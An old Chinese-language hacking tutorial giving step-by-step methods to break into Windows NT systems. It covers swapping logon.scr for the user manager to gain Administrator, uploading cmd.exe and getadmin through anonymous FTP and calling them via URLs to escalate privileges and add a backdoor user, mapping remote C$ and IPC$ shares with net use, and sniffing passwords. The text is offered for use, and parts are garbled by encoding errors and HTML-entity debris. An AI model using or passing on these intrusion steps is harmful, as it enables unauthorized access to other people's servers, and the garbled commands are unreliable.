如果你有普通用戶(hù)帳號(hào),有個(gè)一個(gè)很簡(jiǎn)單的方法獲取NT Administrator帳號(hào): 　

　　先把c:\winnt\system32下的logon.scr改名為logon.old備份 　　

　　然后把usrmgr.exe改名為logon.scr 　　

　　然后重新啟動(dòng) 　　

　　logon.scr是啟動(dòng)時(shí)加載的程序，重新啟動(dòng)后，不會(huì)出現(xiàn)以往的登陸密碼輸入界面，而是用戶(hù)管理器。 　　

　　這時(shí)他就有權(quán)限把自己加到Administrator組 　　

　　不要忘記把文件名改回來(lái)啊! 　　

　　之二: 　　

　　下面的技術(shù)適用于不重視NT網(wǎng)絡(luò)安全的網(wǎng)站, 一些 http的技術(shù)也可以供較高級(jí)的人員參考

　　進(jìn)入NT網(wǎng)絡(luò)可以采取下面的步驟: 　　

　　因?yàn)镹T的IIS server的ftp一般都是允許anonymous匿名帳號(hào)進(jìn)入的，有些anonymous的帳號(hào)還有upload權(quán)限，我們就要攻擊這類(lèi)站點(diǎn)。因?yàn)槿绻�不允許匿名帳號(hào)，就可能造成明文密碼在網(wǎng)上傳輸。用tcpspy的工具可以截獲這些密碼。現(xiàn)在不談這些比較高級(jí)的技術(shù)。　
　
　　正因?yàn)樵试S匿名帳號(hào)ftp登陸的設(shè)定，也給我們帶來(lái)了突破NT server的機(jī)會(huì)。我們用ftp登陸一個(gè)NT server,比如:www.xxx.com(示例名): 　　

　　ftp www.xxx.com 　　

　　Connected to www.xxx.com

　　ntsvr2這個(gè)東西暴露了其N(xiāo)ETbios名,那么在IIS的背景下，必然會(huì)有一個(gè)IUSER_ntsvr2的用戶(hù)帳號(hào)，屬于Domain user組，這個(gè)帳號(hào)我們以后要用來(lái)獲取Administrator的權(quán)限。
　　
　　User (www.xxx.comnone)):anonymous 　　

　　Password: 輸入 guest@ 或者guest 　　

　　對(duì)于缺乏網(wǎng)絡(luò)安全知識(shí)的管理員來(lái)說(shuō),很多人沒(méi)有將guest帳號(hào)禁止，或者沒(méi)有設(shè)置密碼。那么guest帳號(hào)就是一個(gè)可用的正確的用戶(hù)帳號(hào)，雖然只屬于Domain guest組。 　　

　　在這種情況下我們就可以進(jìn)NT server的ftp了。　　

　　進(jìn)去以后,看看目錄列表,試試 cd /c 或wwwroot等關(guān)鍵目錄,如果運(yùn)氣好,改變目錄成功，這時(shí)你就有了80%的把握。 　　

　　現(xiàn)在,開(kāi)始查找cgi-bin目錄(或者scripts目錄),進(jìn)去以后,　　

　　把winnt下的cmd.execopy到cgi-bin,把getadmin和gasys.dll傳上去到cgi-bin 　
　　然后輸入:http://www.xxx.com/cgi-bin/getadmin.exe?IUSR_SATURN　
大約十多秒后屏幕顯示:

　　CGI Error

　　這時(shí)有90%的可能是：你已經(jīng)把IUSER_ntsvr2升級(jí)為Administrator，也就是任何訪問(wèn)該web站的人都是管理員。 　　

　　下面可以add user: 　　

　　http://www.xxx.com/cgi-bin/cmd.exe?/c c:\winnt\system32\net.exe user china news /add

　　這樣就創(chuàng)建了一個(gè)叫china用戶(hù),密碼是news,然后: 　　

　　http://www.xxx.com/cgi-bin/getadmin.exe?china

　　或者

　　http://www.xxx.com/scripts/tools/getadmin.exe?china 　　

　　你再用china的帳號(hào)登陸，就可以有最大的權(quán)限了，也可以用上面的cmd.exe的方法直接修改如果沒(méi)有cmd.exe，也可以自己傳一個(gè)上去到scripts/tools或者cgi-bin目錄。

　　之三: 　　

　　用NT的Netbios技術(shù)掃描 　

　　nbtstat -a http://www.xxx.com/

　　或者 　　

　　nbtstat -A http://www.xxx.com/ 　　

　　這樣可以得到其域的共享資源名稱(chēng) 　　

　　net view file://www.xxx.com/ 　　

　　可以獲得其機(jī)器的共享資源名稱(chēng),如果有c盤(pán)

　　net use f: file://www.xxx.com/c 　　

　　可以用f:映射其c盤(pán)

　　net use $">\\111.111.111.111\ipc$Content$nbsp;"quot;"quot; /user:"quot;"quot;

　　之四: Unix下移植過(guò)來(lái)的工具:　　

　　Windows95"amp;98的用戶(hù)可以用這個(gè)tcp/ip工具去抓tcp/ip連接中的包: 　　

　　WinDump95.exe 使用前還要下載這個(gè)庫(kù) Packet95.exe 　　

　　WindowsNT用戶(hù)的版本

    WinDump.exe PacketNT.exe